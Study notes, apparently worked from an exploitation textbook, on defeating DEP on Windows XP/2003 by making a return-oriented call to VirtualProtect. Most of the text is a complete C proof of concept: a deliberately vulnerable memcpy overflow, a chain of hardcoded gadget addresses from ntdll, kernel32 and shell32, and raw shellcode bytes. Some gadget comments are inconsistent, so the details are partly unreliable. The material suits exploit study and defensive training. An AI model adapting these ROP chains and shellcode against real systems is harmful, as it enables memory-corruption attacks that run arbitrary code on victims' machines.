First, Windows 2003 has DEP enabled by default, so 2003 is usually what people experiment on.
Today I enabled DEP on XP for the experiment; it comes to the same thing.
These are just study notes. The other method:
Ret2libc: call NtSetInformationProcess to turn DEP off for the process.
```c
BOOL VirtualProtect(
    LPVOID lpAddress,      // start of the target region: the start address of the memory holding the shellcode
    DWORD  dwSize,         // size: the shellcode length
    DWORD  flNewProtect,   // requested protection: 0x40 = PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect  // receives the old protection: some writable address
);
```
Returns non-zero on success, 0 if the change fails.
Summary first:
First, it is usually the return address that gets overwritten. Since software DEP is just SafeSEH, the addresses used must come from executable modules!!!
!searchcode jmp esp displays the module attributes; use it when looking for specific code under DEP!!!
The book's example overwrites the return address, and the vulnerable function is changed from strcpy to memcpy, because memcpy does not truncate at "\x00".
```c
#include "stdafx.h"
#include <windows.h>
#include <string.h>

char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    // PS: this address cannot be found quickly with the OD plugin; !searchcode jmp esp can be used
    // 7C80997D 58 pop eax ret
    "\x7d\x99\x80\x7c"
    // address=7C92E7D9
    // message=Found:POP ESI POP EBX POP EDI RETN at 0x7c92e7d9 Module: C:\WINDOWS\system32\ntdll.dll
    "\xd9\xe7\x92\x7c" // ESP, EBP and EAX must not be modified here
    // address=7D760702
    // message=Found:PUSH ESP POP EBP RET 4 at 0x7d760702 Module: C:\WINDOWS\system32\shell32.dll
    "\x02\x07\x76\x7d"
    // 7C92120F C3 retn
    "\x0f\x12\x92\x7c"
    "\x90\x90\x90\x90"
    "\xc6\xc6\xeb\x77" // 77EBC6C6 push esp jmp esp
    "\xff\x00\x00\x00" // size of the memory whose protection is changed
    "\x40\x00\x00\x00" // protection code for readable/writable/executable memory
    "\xc6\xc6\xeb\x77" // 77EBC6C6 push esp jmp eax
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    /* 7C801AD9 FF75 14    push dword ptr ss:[ebp+0x14]
       7C801ADC FF75 10    push dword ptr ss:[ebp+0x10]
       7C801ADF FF75 0C    push dword ptr ss:[ebp+0xC]
       7C801AE2 FF75 08    push dword ptr ss:[ebp+0x8]
       7C801AE5 6A FF      push -0x1
       7C801AE7 E8 75FFFFFF call kernel32.VirtualProtectEx */
    "\xd9\x1a\x80\x7c"
    "\x90\x90\x90\x90"
    // 7C8369F0 FFD4 call esp
    "\xf0\x69\x83\x7c"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
    // shellcode:
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53"
    "\x68\x64\x61\x30\x23"
    "\x68\x23\x50\x61\x6E"
    "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"; // 168 bytes

// the vulnerable function: memcpy copies 420 bytes into a 176-byte stack buffer
void test()
{
    char str[176];
    memcpy(str, shellcode, 420);
}

int main(int argc, char* argv[])
{
    HINSTANCE hInst = LoadLibrary("shell32.dll"); // load shell32 so its gadget address is valid
    char temp[200];
    test();
    return 0;
}
```
This method is not really practical; let's see whether it can be broken through, because strcpy truncates the string at null bytes.